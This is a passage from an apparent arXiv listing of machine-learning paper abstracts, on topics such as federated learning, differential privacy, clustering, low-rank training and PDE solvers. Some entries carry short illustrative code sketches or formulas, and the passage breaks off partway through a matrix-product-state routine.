vs the ground truth ECG time-series. The results show an average signal recovery SNR of 27$\pm$2.8\,dB, demonstrating the significance of the proposed synthetic ECG image dataset for training deep learning models. The codebase is available as an open-access toolbox for ECG research.  ( 3 min )
    Lipschitzness Effect of a Loss Function on Generalization Performance of Deep Neural Networks Trained by Adam and AdamW Optimizers. (arXiv:2303.16464v2 [cs.LG] UPDATED)
    The generalization performance of deep neural networks with regard to the optimization algorithm is one of the major concerns in machine learning. This performance can be affected by various factors. In this paper, we theoretically prove that the Lipschitz constant of a loss function is an important factor to diminish the generalization error of the output model obtained by Adam or AdamW. The results can be used as a guideline for choosing the loss function when the optimization algorithm is Adam or AdamW. In addition, to evaluate the theoretical bound in a practical setting, we choose the human age estimation problem in computer vision. For assessing the generalization better, the training and test datasets are drawn from different distributions. Our experimental evaluation shows that the loss function with a lower Lipschitz constant and maximum value improves the generalization of the model trained by Adam or AdamW.  ( 2 min )
    DiffTAD: Temporal Action Detection with Proposal Denoising Diffusion. (arXiv:2303.14863v2 [cs.CV] UPDATED)
    We propose a new formulation of temporal action detection (TAD) with denoising diffusion, DiffTAD in short. Taking as input random temporal proposals, it can yield action proposals accurately given an untrimmed long video. This presents a generative modeling perspective, against previous discriminative learning manners. This capability is achieved by first diffusing the ground-truth proposals to random ones (i.e., the forward/noising process) and then learning to reverse the noising process (i.e., the backward/denoising process). Concretely, we establish the denoising process in the Transformer decoder (e.g., DETR) by introducing a temporal location query design with faster convergence in training. We further propose a cross-step selective conditioning algorithm for inference acceleration. Extensive evaluations on ActivityNet and THUMOS show that our DiffTAD achieves top performance compared to previous art alternatives. The code will be made available at https://github.com/sauradip/DiffusionTAD.  ( 2 min )
    CLIPood: Generalizing CLIP to Out-of-Distributions. (arXiv:2302.00864v2 [cs.LG] UPDATED)
    Out-of-distribution (OOD) generalization, where the model needs to handle distribution shifts from training, is a major challenge of machine learning. Contrastive language-image pre-training (CLIP) models have shown impressive zero-shot ability, but the further adaptation of CLIP on downstream tasks undesirably degrades OOD performances. This paper aims at generalizing CLIP to out-of-distribution test data on downstream tasks. We propose CLIPood, a fine-tuning method that can adapt CLIP models to OOD situations where both domain shifts and open classes may occur on the unseen test data. To exploit the semantic relations between classes from the text modality, CLIPood introduces a new training objective, margin metric softmax (MMS), with class adaptive margins for fine-tuning. To incorporate both pre-trained zero-shot model and fine-tuned task-adaptive model, CLIPood leverages a new optimization strategy, Beta moving average (BMA), to maintain a temporal ensemble weighted by Beta distribution. Experiments on diverse datasets with different OOD scenarios show that CLIPood consistently outperforms existing generalization techniques.  ( 2 min )
    DoCoFL: Downlink Compression for Cross-Device Federated Learning. (arXiv:2302.00543v2 [cs.LG] UPDATED)
    Many compression techniques have been proposed to reduce the communication overhead of Federated Learning training procedures. However, these are typically designed for compressing model updates, which are expected to decay throughout training. As a result, such methods are inapplicable to downlink (i.e., from the parameter server to clients) compression in the cross-device setting, where heterogeneous clients $\textit{may appear only once}$ during training and thus must download the model parameters. Accordingly, we propose $\textsf{DoCoFL}$ -- a new framework for downlink compression in the cross-device setting. Importantly, $\textsf{DoCoFL}$ can be seamlessly combined with many uplink compression schemes, rendering it suitable for bi-directional compression. Through extensive evaluation, we show that $\textsf{DoCoFL}$ offers significant bi-directional bandwidth reduction while achieving competitive accuracy to that of a baseline without any compression.  ( 2 min )
    Differentially Private Stochastic Gradient Descent with Low-Noise. (arXiv:2209.04188v2 [stat.ML] UPDATED)
    Modern machine learning algorithms aim to extract fine-grained information from data to provide accurate predictions, which often conflicts with the goal of privacy protection. This paper addresses the practical and theoretical importance of developing privacy-preserving machine learning algorithms that ensure good performance while preserving privacy. In this paper, we focus on the privacy and utility (measured by excess risk bounds) performances of differentially private stochastic gradient descent (SGD) algorithms in the setting of stochastic convex optimization. Specifically, we examine the pointwise problem in the low-noise setting for which we derive sharper excess risk bounds for the differentially private SGD algorithm. In the pairwise learning setting, we propose a simple differentially private SGD algorithm based on gradient perturbation. Furthermore, we develop novel utility bounds for the proposed algorithm, proving that it achieves optimal excess risk rates even for non-smooth losses. Notably, we establish fast learning rates for privacy-preserving pairwise learning under the low-noise condition, which is the first of its kind.  ( 2 min )
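    The gradient-perturbation mechanism referenced here follows the usual clip-then-noise pattern; the constants below (clipping norm, noise multiplier) are illustrative, not the paper's calibrated values. A minimal sketch:

```python
import numpy as np

rng = np.random.default_rng(0)

def dp_sgd_step(w, grad, lr=0.1, clip_norm=1.0, sigma=1.0):
    """One SGD step with gradient perturbation.

    Step 1 clips the gradient to L2 norm <= clip_norm, bounding its
    sensitivity; step 2 adds Gaussian noise with scale sigma * clip_norm.
    Both constants here are illustrative.
    """
    g = np.asarray(grad, dtype=float)
    g = g / max(1.0, np.linalg.norm(g) / clip_norm)      # L2 clipping
    g = g + rng.normal(0.0, sigma * clip_norm, size=g.shape)
    return np.asarray(w, dtype=float) - lr * g

w = dp_sgd_step(np.zeros(3), grad=[10.0, 0.0, 0.0])
```

    The privacy/utility trade-off the abstract analyzes comes entirely from sigma: larger noise gives stronger privacy but inflates the excess risk the bounds control.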
    Stream-based active learning with linear models. (arXiv:2207.09874v5 [stat.ML] UPDATED)
    The proliferation of automated data collection schemes and the advances in sensorics are increasing the amount of data we are able to monitor in real-time. However, given the high annotation costs and the time required by quality inspections, data is often available in an unlabeled form. This is fostering the use of active learning for the development of soft sensors and predictive models. In production, instead of performing random inspections to obtain product information, labels are collected by evaluating the information content of the unlabeled data. Several query strategy frameworks for regression have been proposed in the literature but most of the focus has been dedicated to the static pool-based scenario. In this work, we propose a new strategy for the stream-based scenario, where instances are sequentially offered to the learner, which must instantaneously decide whether to perform the quality check to obtain the label or discard the instance. The approach is inspired by the optimal experimental design theory and the iterative aspect of the decision-making process is tackled by setting a threshold on the informativeness of the unlabeled data points. The proposed approach is evaluated using numerical simulations and the Tennessee Eastman Process simulator. The results confirm that selecting the examples suggested by the proposed algorithm allows for a faster reduction in the prediction error.  ( 3 min )
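    The threshold-based decision rule can be sketched with a generic optimal-design informativeness score (the leverage of the candidate point under the current design); the exact criterion in the paper may differ:

```python
import numpy as np

def should_query(x, XtX_inv, threshold):
    """Query the label iff the candidate's informativeness exceeds a
    threshold. The score x^T (X^T X)^{-1} x is a generic optimal-design
    (leverage-style) criterion; the paper's exact rule may differ.
    """
    x = np.asarray(x, dtype=float)
    return float(x @ XtX_inv @ x) > threshold

# Stream sketch: points arrive one by one; query only informative ones.
XtX_inv = np.eye(2)  # inverse design matrix of the data seen so far
queried = [should_query(x, XtX_inv, threshold=0.5)
           for x in ([1.0, 0.0], [0.1, 0.0], [0.0, 2.0])]
```

    Points far from the directions already covered by the design score high and trigger an inspection; redundant points are discarded, which is what drives the faster error reduction reported above.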
    Stack More Layers Differently: High-Rank Training Through Low-Rank Updates. (arXiv:2307.05695v2 [cs.CL] UPDATED)
    Despite the dominance and effectiveness of scaling, resulting in large networks with hundreds of billions of parameters, the necessity to train overparametrized models remains poorly understood, and alternative approaches do not necessarily make it cheaper to train high-performance models. In this paper, we explore low-rank training techniques as an alternative approach to training large neural networks. We introduce a novel method called ReLoRA, which utilizes low-rank updates to train high-rank networks. We apply ReLoRA to pre-training transformer language models with up to 350M parameters and demonstrate comparable performance to regular neural network training. Furthermore, we observe that the efficiency of ReLoRA increases with model size, making it a promising approach for training multi-billion-parameter networks efficiently. Our findings shed light on the potential of low-rank training techniques and their implications for scaling laws.  ( 2 min )
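    The mechanic behind ReLoRA, as described, is to accumulate a high-rank total update through repeated merge-and-restart cycles of low-rank factors. A toy numpy sketch with illustrative sizes (no actual training; random factors stand in for trained ones):

```python
import numpy as np

rng = np.random.default_rng(0)
d, r, restarts = 8, 2, 4           # rank r << d; sizes are illustrative

W = rng.normal(size=(d, d))        # base weight matrix
total_update = np.zeros((d, d))

for _ in range(restarts):
    # Stand-in for one LoRA training phase: a fresh rank-r factorization.
    A = rng.normal(size=(d, r))
    B = rng.normal(size=(r, d))
    W += A @ B                     # merge the low-rank update into W
    total_update += A @ B          # then restart with new factors
```

    Each individual A @ B has rank at most r, but the accumulated update generically reaches much higher rank after enough restarts, which is the sense in which low-rank updates can train a high-rank network.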
    Dink-Net: Neural Clustering on Large Graphs. (arXiv:2305.18405v3 [cs.LG] UPDATED)
    Deep graph clustering, which aims to group the nodes of a graph into disjoint clusters with deep neural networks, has achieved promising progress in recent years. However, the existing methods fail to scale to large graphs with millions of nodes. To solve this problem, a scalable deep graph clustering method (Dink-Net) is proposed with the idea of dilation and shrink. Firstly, representations are learned in a self-supervised manner by discriminating whether nodes have been corrupted by augmentations. Meanwhile, the cluster centres are initialized as learnable neural parameters. Subsequently, the clustering distribution is optimized by minimizing the proposed cluster dilation loss and cluster shrink loss in an adversarial manner. With these settings, we unify the two steps of clustering, i.e., representation learning and clustering optimization, into an end-to-end framework, guiding the network to learn clustering-friendly features. Besides, Dink-Net scales well to large graphs since the designed loss functions adopt mini-batch data to optimize the clustering distribution without performance drops. Both experimental results and theoretical analyses demonstrate the superiority of our method. Compared to the runner-up, Dink-Net achieves a 9.62% NMI improvement on the ogbn-papers100M dataset with 111 million nodes and 1.6 billion edges. The source code is released at https://github.com/yueliu1999/Dink-Net. Besides, a collection (papers, codes, and datasets) of deep graph clustering is shared at https://github.com/yueliu1999/Awesome-Deep-Graph-Clustering.  ( 3 min )
    The Re-Label Method For Data-Centric Machine Learning. (arXiv:2302.04391v4 [cs.LG] UPDATED)
    In industrial deep learning applications, manually labeled data contains a certain amount of noise. To solve this problem and achieve a score above 90 on the dev dataset, we present a simple method to find the noisy data and have humans re-label it, given the model predictions as references during human labeling. In this paper, we illustrate our idea for a broad set of deep learning tasks, including classification, sequence tagging, object detection, sequence generation, and click-through rate prediction. The experimental results and human evaluation results verify our idea.
    A Data Mining Approach for Detecting Collusion in Unproctored Online Exams. (arXiv:2302.07014v3 [cs.CY] UPDATED)
    Due to the precautionary measures during the COVID-19 pandemic many universities offered unproctored take-home exams. We propose methods to detect potential collusion between students and apply our approach on event log data from take-home exams during the pandemic. We find groups of students with suspiciously similar exams. In addition, we compare our findings to a proctored control group. By this, we establish a rule of thumb for evaluating which cases are "outstandingly similar", i.e., suspicious cases.
    Interpretable and Intervenable Ultrasonography-based Machine Learning Models for Pediatric Appendicitis. (arXiv:2302.14460v2 [cs.LG] UPDATED)
    Appendicitis is among the most frequent reasons for pediatric abdominal surgeries. With recent advances in machine learning, data-driven decision support could help clinicians diagnose and manage patients while reducing the number of non-critical surgeries. Previous decision support systems for appendicitis focused on clinical, laboratory, scoring and computed tomography data, mainly ignoring abdominal ultrasound, a noninvasive and readily available diagnostic modality. To this end, we developed and validated interpretable machine learning models for predicting the diagnosis, management and severity of suspected appendicitis using ultrasound images. Our models were trained on a dataset comprising 579 pediatric patients with 1709 ultrasound images accompanied by clinical and laboratory data. Our methodological contribution is the generalization of concept bottleneck models to prediction problems with multiple views and incomplete concept sets. Notably, such models lend themselves to interpretation and interaction via high-level concepts understandable to clinicians without sacrificing performance or requiring time-consuming image annotation when deployed.
    Adaptive Linear Estimating Equations. (arXiv:2307.07320v1 [math.ST])
    Sequential data collection has emerged as a widely adopted technique for enhancing the efficiency of data gathering processes. Despite its advantages, such data collection mechanism often introduces complexities to the statistical inference procedure. For instance, the ordinary least squares (OLS) estimator in an adaptive linear regression model can exhibit non-normal asymptotic behavior, posing challenges for accurate inference and interpretation. In this paper, we propose a general method for constructing a debiased estimator which remedies this issue. It makes use of the idea of adaptive linear estimating equations, and we establish theoretical guarantees of asymptotic normality, supplemented by discussions on achieving near-optimal asymptotic variance. A salient feature of our estimator is that in the context of multi-armed bandits, our estimator retains the non-asymptotic performance of the least squares estimator while obtaining the asymptotic normality property. Consequently, this work helps connect two fruitful paradigms of adaptive inference: a) non-asymptotic inference using concentration inequalities and b) asymptotic inference via asymptotic normality.
    Global $k$-means$++$: an effective relaxation of the global $k$-means clustering algorithm. (arXiv:2211.12271v3 [cs.LG] UPDATED)
    The $k$-means algorithm is a prevalent clustering method due to its simplicity, effectiveness, and speed. However, its main disadvantage is its high sensitivity to the initial positions of the cluster centers. The global $k$-means is a deterministic algorithm proposed to tackle the random initialization problem of $k$-means, but it is well known to require high computational cost. It partitions the data into $K$ clusters by solving all $k$-means sub-problems incrementally for all $k=1,\ldots, K$. For each $k$-cluster problem, the method executes the $k$-means algorithm $N$ times, where $N$ is the number of datapoints. In this paper, we propose the \emph{global $k$-means\texttt{++}} clustering algorithm, which is an effective way of acquiring quality clustering solutions akin to those of global $k$-means with a reduced computational load. This is achieved by exploiting the center selection probability that is effectively used in the $k$-means\texttt{++} algorithm. The proposed method has been tested and compared on various benchmark datasets, yielding very satisfactory results in terms of clustering quality and execution speed.
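    The $k$-means++ center-selection probability the method exploits weights each point by its squared distance to the nearest existing center. A minimal sketch:

```python
import numpy as np

rng = np.random.default_rng(0)

def kmeanspp_next_center(X, centers):
    """Sample the next center with probability proportional to D(x)^2,
    the squared distance to the nearest current center (k-means++ rule)."""
    diffs = X[:, None, :] - centers[None, :, :]
    d2 = np.min((diffs ** 2).sum(axis=-1), axis=1)   # D(x)^2 per point
    return X[rng.choice(len(X), p=d2 / d2.sum())]

X = rng.normal(size=(100, 2))
centers = X[:1]                    # seed with an arbitrary first center
c2 = kmeanspp_next_center(X, centers)
```

    Sampling a handful of such candidates, instead of trying all $N$ points as global $k$-means does, is what cuts the computational load while keeping solution quality close.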
    Rank-based Decomposable Losses in Machine Learning: A Survey. (arXiv:2207.08768v3 [cs.LG] UPDATED)
    Recent works have revealed an essential paradigm in designing loss functions that differentiate individual losses vs. aggregate losses. The individual loss measures the quality of the model on a sample, while the aggregate loss combines individual losses/scores over each training sample. Both have a common procedure that aggregates a set of individual values to a single numerical value. The ranking order reflects the most fundamental relation among individual values in designing losses. In addition, decomposability, in which a loss can be decomposed into an ensemble of individual terms, becomes a significant property of organizing losses/scores. This survey provides a systematic and comprehensive review of rank-based decomposable losses in machine learning. Specifically, we provide a new taxonomy of loss functions that follows the perspectives of aggregate loss and individual loss. We identify the aggregator to form such losses, which are examples of set functions. We organize the rank-based decomposable losses into eight categories. Following these categories, we review the literature on rank-based aggregate losses and rank-based individual losses. We describe general formulas for these losses and connect them with existing research topics. We also suggest future research directions spanning unexplored, remaining, and emerging issues in rank-based decomposable losses.
    Alternating the Population and Control Neural Networks to Solve High-Dimensional Stochastic Mean-Field Games. (arXiv:2002.10113v4 [cs.LG] UPDATED)
    We present APAC-Net, an alternating population and agent control neural network for solving stochastic mean field games (MFGs). Our algorithm is geared toward high-dimensional instances of MFGs that are beyond reach with existing solution methods. We achieve this in two steps. First, we take advantage of the underlying variational primal-dual structure that MFGs exhibit and phrase it as a convex-concave saddle point problem. Second, we parameterize the value and density functions by two neural networks, respectively. By phrasing the problem in this manner, solving the MFG can be interpreted as a special case of training a generative adversarial network (GAN). We show the potential of our method on up to 100-dimensional MFG problems.  ( 2 min )
    Model-Assisted Probabilistic Safe Adaptive Control With Meta-Bayesian Learning. (arXiv:2307.00828v2 [eess.SY] UPDATED)
    Breaking safety constraints in control systems can lead to potential risks, resulting in unexpected costs or catastrophic damage. Nevertheless, uncertainty is ubiquitous, even among similar tasks. In this paper, we develop a novel adaptive safe control framework that integrates meta learning, Bayesian models, and the control barrier function (CBF) method. Specifically, with the help of the CBF method, we learn the inherent and external uncertainties with a unified adaptive Bayesian linear regression (ABLR) model, which consists of a forward neural network (NN) and a Bayesian output layer. Meta learning techniques are leveraged to pre-train the NN weights and priors of the ABLR model using data collected from historical similar tasks. For a new control task, we refine the meta-learned models using a few samples, and introduce pessimistic confidence bounds into CBF constraints to ensure safe control. Moreover, we provide theoretical criteria to guarantee probabilistic safety during the control processes. To validate our approach, we conduct comparative experiments in various obstacle avoidance scenarios. The results demonstrate that our algorithm significantly improves the Bayesian model-based CBF method, and is capable of efficient safe exploration even with multiple uncertain constraints.
    TSNet-SAC: Leveraging Transformers for Efficient Task Scheduling. (arXiv:2307.07445v1 [cs.NI])
    In future 6G Mobile Edge Computing (MEC), autopilot systems require the capability of processing multimodal data with strong interdependencies. However, traditional heuristic algorithms are inadequate for real-time scheduling due to their requirement for multiple iterations to derive the optimal scheme. We propose a novel TSNet-SAC based on the Transformer, which utilizes heuristic algorithms solely to guide the training of TSNet. Additionally, a Sliding Augment Component (SAC) is introduced to enhance robustness and resolve algorithm defects. Furthermore, the Extender component is designed to handle multi-scale training data and provide network scalability, enabling TSNet to adapt to different access scenarios. Simulation demonstrates that TSNet-SAC outperforms existing networks in accuracy and robustness, achieving superior scheduling latency compared to heuristic algorithms.  ( 2 min )
    Identifiability Guarantees for Causal Disentanglement from Soft Interventions. (arXiv:2307.06250v2 [stat.ML] UPDATED)
    Causal disentanglement aims to uncover a representation of data using latent variables that are interrelated through a causal model. Such a representation is identifiable if the latent model that explains the data is unique. In this paper, we focus on the scenario where unpaired observational and interventional data are available, with each intervention changing the mechanism of a latent variable. When the causal variables are fully observed, statistically consistent algorithms have been developed to identify the causal model under faithfulness assumptions. We here show that identifiability can still be achieved with unobserved causal variables, given a generalized notion of faithfulness. Our results guarantee that we can recover the latent causal model up to an equivalence class and predict the effect of unseen combinations of interventions, in the limit of infinite data. We implement our causal disentanglement framework by developing an autoencoding variational Bayes algorithm and apply it to the problem of predicting combinatorial perturbation effects in genomics.
    Online Convex Optimization with Stochastic Constraints: Zero Constraint Violation and Bandit Feedback. (arXiv:2301.11267v2 [math.OC] UPDATED)
    This paper studies online convex optimization with stochastic constraints. We propose a variant of the drift-plus-penalty algorithm that guarantees $O(\sqrt{T})$ expected regret and zero constraint violation, after a fixed number of iterations, which improves the vanilla drift-plus-penalty method with $O(\sqrt{T})$ constraint violation. Our algorithm is oblivious to the length of the time horizon $T$, in contrast to the vanilla drift-plus-penalty method. This is based on our novel drift lemma that provides time-varying bounds on the virtual queue drift and, as a result, leads to time-varying bounds on the expected virtual queue length. Moreover, we extend our framework to stochastic-constrained online convex optimization under two-point bandit feedback. We show that by adapting our algorithmic framework to the bandit feedback setting, we may still achieve $O(\sqrt{T})$ expected regret and zero constraint violation, improving upon the previous work for the case of identical constraint functions. Numerical results demonstrate our theoretical results.
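    For reference, the classical drift-plus-penalty template that the proposed variant builds on (shown schematically; in the online setting the loss term is typically replaced by a linearized surrogate, and the paper's modifications are what remove the constraint violation) trades off loss against virtual queue backlogs and then updates the queues:

    $$x_t \in \arg\min_{x \in \mathcal{X}} \Big\{ V f_t(x) + \sum_i Q_i(t)\, g_i(x) \Big\}, \qquad Q_i(t+1) = \max\{ Q_i(t) + g_i(x_t),\, 0 \},$$

    where $V > 0$ controls the regret/violation trade-off and $Q_i(t)$ is the virtual queue associated with constraint function $g_i$.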
    Ed-Fed: A generic federated learning framework with resource-aware client selection for edge devices. (arXiv:2307.07199v1 [cs.DC])
    Federated learning (FL) has evolved as a prominent method for edge devices to cooperatively create a unified prediction model while keeping their sensitive training data local to the device. Despite the existence of numerous research frameworks for simulating FL algorithms, they do not facilitate comprehensive deployment for automatic speech recognition tasks on heterogeneous edge devices. This is where Ed-Fed, a comprehensive and generic FL framework, comes in as a foundation for future practical FL system research. We also propose a novel resource-aware client selection algorithm to optimise the waiting time in FL settings. We show that our approach can handle straggler devices and dynamically set the training time for the selected devices in a round. Our evaluation has shown that the proposed approach significantly optimises waiting time in FL compared to conventional random client selection methods.  ( 2 min )
    Unpacking the Black Box: Regulating Algorithmic Decisions. (arXiv:2110.03443v2 [econ.GN] UPDATED)
    We show how to optimally regulate prediction algorithms in a world where an agent uses complex 'black-box' prediction functions to make decisions such as lending, medical testing, or hiring, and where a principal is limited in how much she can learn about the agent's black-box model. We show that limiting agents to prediction functions that are simple enough to be fully transparent is inefficient as long as the misalignment is limited and first-best prediction functions are sufficiently complex. Algorithmic audits can improve welfare, but the gains depend on the design of the audit tools. Tools that focus on minimizing overall information loss, the focus of many explainer tools, will generally be inefficient since they focus on explaining the average behavior of the prediction function. Targeted tools that focus on the source of incentive misalignment, e.g., excess false positives or racial disparities, can provide second-best solutions. We provide empirical support for our theoretical findings using an application in consumer lending, where we document that complex models regulated based on context-specific explanation tools outperform simple, fully transparent models. This gain from complex models represents a Pareto improvement across our empirical applications that are preferred both by the lender and from the perspective of the financial regulator.
    Deep Explainable Relational Reinforcement Learning: A Neuro-Symbolic Approach. (arXiv:2304.08349v2 [cs.AI] UPDATED)
    Despite numerous successes in Deep Reinforcement Learning (DRL), the learned policies are not interpretable. Moreover, since DRL does not exploit symbolic relational representations, it has difficulties in coping with structural changes in its environment (such as increasing the number of objects). Relational Reinforcement Learning, on the other hand, inherits the relational representations from symbolic planning to learn reusable policies. However, it has so far been unable to scale up and exploit the power of deep neural networks. We propose Deep Explainable Relational Reinforcement Learning (DERRL), a framework that exploits the best of both -- neural and symbolic worlds. By resorting to a neuro-symbolic approach, DERRL combines relational representations and constraints from symbolic planning with deep learning to extract interpretable policies. These policies are in the form of logical rules that explain how each decision (or action) is arrived at. Through several experiments, in setups like the Countdown Game, Blocks World, Gridworld, and Traffic, we show that the policies learned by DERRL can be applied to different configurations and contexts, hence generalizing to environmental modifications.
    Few-Shot Continual Learning via Flat-to-Wide Approaches. (arXiv:2306.14369v2 [cs.LG] UPDATED)
    Existing approaches to continual learning require large numbers of training samples. Such approaches are impractical for many real-world problems with limited samples because of the overfitting problem. This paper proposes a few-shot continual learning approach, termed FLat-tO-WidE AppRoach (FLOWER), where a flat-to-wide learning process finding the flat-wide minima is proposed to address the catastrophic forgetting problem. The issue of data scarcity is overcome with a data augmentation approach making use of a ball-generator concept to restrict the sampling space to the smallest enclosing ball. Our numerical studies demonstrate the advantage of FLOWER, achieving significantly improved performance over prior art, notably on small base tasks. For further study, the source code of FLOWER, competitor algorithms and experimental logs are shared publicly at \url{https://github.com/anwarmaxsum/FLOWER}.
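The ball-generator idea can be sketched as follows (a minimal illustration, not the paper's implementation: the enclosing ball is approximated here by the centroid and the maximum distance to it, whereas an exact smallest enclosing ball would require e.g. Welzl's algorithm):

```python
import numpy as np

def ball_augment(samples, n_new, rng=None):
    """Generate augmented points inside an enclosing ball of the samples.

    The ball is approximated by the centroid and the maximum distance to
    it; this is a simplification of the smallest enclosing ball.
    """
    rng = np.random.default_rng(rng)
    samples = np.asarray(samples, dtype=float)
    center = samples.mean(axis=0)
    radius = np.linalg.norm(samples - center, axis=1).max()
    d = samples.shape[1]
    # Uniform sampling in a ball: random direction, radius ~ R * U^(1/d).
    dirs = rng.normal(size=(n_new, d))
    dirs /= np.linalg.norm(dirs, axis=1, keepdims=True)
    radii = radius * rng.random(n_new) ** (1.0 / d)
    return center + dirs * radii[:, None]
```

Keeping augmented points inside the ball avoids generating samples far from the support of the few available examples.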
    Fully probabilistic deep models for forward and inverse problems in parametric PDEs. (arXiv:2208.04856v2 [stat.ML] UPDATED)
    We introduce a physics-driven deep latent variable model (PDDLVM) to learn simultaneously parameter-to-solution (forward) and solution-to-parameter (inverse) maps of parametric partial differential equations (PDEs). Our formulation leverages conventional PDE discretization techniques, deep neural networks, probabilistic modelling, and variational inference to assemble a fully probabilistic coherent framework. In the posited probabilistic model, both the forward and inverse maps are approximated as Gaussian distributions with a mean and covariance parameterized by deep neural networks. The PDE residual is assumed to be an observed random vector of value zero, hence we model it as a random vector with a zero mean and a user-prescribed covariance. The model is trained by maximizing the probability of observing a residual of zero, that is, the evidence or marginal likelihood, via the evidence lower bound (ELBO). Consequently, the proposed methodology does not require any independent PDE solves and is physics-informed at training time, allowing the real-time solution of PDE forward and inverse problems after training. The proposed framework can be easily extended to seamlessly integrate observed data to solve inverse problems and to build generative models. We demonstrate the efficiency and robustness of our method on finite element discretized parametric PDE problems such as linear and nonlinear Poisson problems, elastic shells with complex 3D geometries, and time-dependent nonlinear and inhomogeneous PDEs using a physics-informed neural network (PINN) discretization. We achieve up to three orders of magnitude speed-up after training compared to the traditional finite element method (FEM), while outputting coherent uncertainty estimates.
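The training objective described above can be sketched in generic notation (the symbols here, $R$, $\Sigma_r$, $q_\phi$, are illustrative and not necessarily the paper's): the discretized residual $R(u, z)$ of solution $u$ and parameters $z$ is treated as an observation pinned to zero, and the evidence of that observation is bounded from below by the standard ELBO:

```latex
p(r = 0 \mid u, z) = \mathcal{N}\!\big(0 \,\big|\, R(u, z),\, \Sigma_r\big),
\qquad
\log p(r = 0) \;\geq\;
\mathbb{E}_{q_\phi(u, z)}\!\big[\log p(r = 0 \mid u, z)\big]
- \mathrm{KL}\!\big(q_\phi(u, z) \,\|\, p(u, z)\big).
```

Maximizing the right-hand side drives the residual toward zero in expectation, which is how the method stays physics-informed without independent PDE solves.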
    Proof of Training (PoT): Harnessing Crypto Mining Power for Distributed AI Training. (arXiv:2307.07066v1 [cs.CR])
    In the midst of the emerging trend of integrating artificial intelligence (AI) with crypto mining, we identify three major challenges that create a gap between these two fields. To bridge this gap, we introduce the proof-of-training (PoT) protocol, an approach that combines the strengths of both AI and blockchain technology. The PoT protocol utilizes the practical Byzantine fault tolerance (PBFT) consensus mechanism to synchronize global states. To evaluate the performance of the protocol design, we present an implementation of a decentralized training network (DTN) that adopts the PoT protocol. Our results indicate that the protocol exhibits considerable potential in terms of task throughput, system robustness, and network security.
    HEAL-SWIN: A Vision Transformer On The Sphere. (arXiv:2307.07313v1 [cs.CV])
    High-resolution wide-angle fisheye images are becoming more and more important for robotics applications such as autonomous driving. However, using ordinary convolutional neural networks or vision transformers on this data is problematic due to projection and distortion losses introduced when projecting to a rectangular grid on the plane. We introduce the HEAL-SWIN transformer, which combines the highly uniform Hierarchical Equal Area iso-Latitude Pixelation (HEALPix) grid used in astrophysics and cosmology with the Hierarchical Shifted-Window (SWIN) transformer to yield an efficient and flexible model capable of training on high-resolution, distortion-free spherical data. In HEAL-SWIN, the nested structure of the HEALPix grid is used to perform the patching and windowing operations of the SWIN transformer, resulting in a one-dimensional representation of the spherical data with minimal computational overhead. We demonstrate the superior performance of our model for semantic segmentation and depth regression tasks on both synthetic and real automotive datasets. Our code is available at https://github.com/JanEGerken/HEAL-SWIN.  ( 2 min )
    Real-time Percussive Technique Recognition and Embedding Learning for the Acoustic Guitar. (arXiv:2307.07426v1 [cs.SD])
    Real-time music information retrieval (RT-MIR) has much potential to augment the capabilities of traditional acoustic instruments. We develop RT-MIR techniques aimed at augmenting percussive fingerstyle, which blends acoustic guitar playing with guitar body percussion. We formulate several design objectives for RT-MIR systems for augmented instrument performance: (i) causal constraint, (ii) perceptually negligible action-to-sound latency, (iii) control intimacy support, (iv) synthesis control support. We present and evaluate real-time guitar body percussion recognition and embedding learning techniques based on convolutional neural networks (CNNs) and CNNs jointly trained with variational autoencoders (VAEs). We introduce a taxonomy of guitar body percussion based on hand part and location. We follow a cross-dataset evaluation approach by collecting three datasets labelled according to the taxonomy. The embedding quality of the models is assessed using KL-Divergence across distributions corresponding to different taxonomic classes. Results indicate that the networks are strong classifiers especially in a simplified 2-class recognition task, and the VAEs yield improved class separation compared to CNNs as evidenced by increased KL-Divergence across distributions. We argue that the VAE embedding quality could support control intimacy and rich interaction when the latent space's parameters are used to control an external synthesis engine. Further design challenges around generalisation to different datasets have been identified.  ( 2 min )
    Hypothesis Transfer Learning with Surrogate Classification Losses: Generalization Bounds through Algorithmic Stability. (arXiv:2305.19694v2 [stat.ML] UPDATED)
    Hypothesis transfer learning (HTL) contrasts with domain adaptation by allowing a previous task (the source) to be leveraged in a new one (the target) without requiring access to the source data. Indeed, HTL relies only on a hypothesis learnt from such source data, relieving the hurdle of expensive data storage and providing great practical benefits. Hence, HTL is highly beneficial for real-world applications relying on big data. The analysis of such a method from a theoretical perspective faces multiple challenges, particularly in classification tasks. This paper deals with this problem by studying the learning theory of HTL through algorithmic stability, an attractive theoretical framework for the analysis of machine learning algorithms. In particular, we are interested in the statistical behaviour of the regularized empirical risk minimizers in the case of binary classification. Our stability analysis provides learning guarantees under mild assumptions. Consequently, we derive several complexity-free generalization bounds for essential statistical quantities like the training error, the excess risk and cross-validation estimates. These refined bounds allow understanding the benefits of transfer learning and comparing the behaviour of standard losses in different scenarios, leading to valuable insights for practitioners.
    Privacy-preserving machine learning with tensor networks. (arXiv:2202.12319v2 [cs.CR] UPDATED)
    Tensor networks, widely used for providing efficient representations of low-energy states of local quantum many-body systems, have been recently proposed as machine learning architectures which could present advantages with respect to traditional ones. In this work we show that tensor network architectures have especially prospective properties for privacy-preserving machine learning, which is important in tasks such as the processing of medical records. First, we describe a new privacy vulnerability that is present in feedforward neural networks, illustrating it in synthetic and real-world datasets. Then, we develop well-defined conditions to guarantee robustness to such vulnerability, which involve the characterization of models equivalent under gauge symmetry. We rigorously prove that such conditions are satisfied by tensor-network architectures. In doing so, we define a novel canonical form for matrix product states, which has a high degree of regularity and fixes the residual gauge that is left in the canonical forms based on singular value decompositions. We supplement the analytical findings with practical examples where matrix product states are trained on datasets of medical records, which show large reductions on the probability of an attacker extracting information about the training dataset from the model's parameters. Given the growing expertise in training tensor-network architectures, these results imply that one may not have to be forced to make a choice between accuracy in prediction and ensuring the privacy of the information processed.
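The SVD-based canonical form mentioned above, whose residual gauge the paper's novel form fixes, can be sketched for a small matrix product state (a generic illustration with cores of assumed shape (D_left, d, D_right), not the paper's code):

```python
import numpy as np

def left_canonicalize(cores):
    """Left-canonicalize an MPS via SVD sweeps.

    After the sweep, each core A (except the last) satisfies
    sum_s A[s]^T A[s] = I (an isometry), which fixes most of the gauge
    freedom; the SVD-based form still leaves a residual gauge.
    """
    cores = [c.astype(float) for c in cores]
    for i in range(len(cores) - 1):
        Dl, d, Dr = cores[i].shape
        mat = cores[i].reshape(Dl * d, Dr)
        U, S, Vt = np.linalg.svd(mat, full_matrices=False)
        cores[i] = U.reshape(Dl, d, U.shape[1])
        # Absorb S Vt into the next core so the represented tensor is unchanged.
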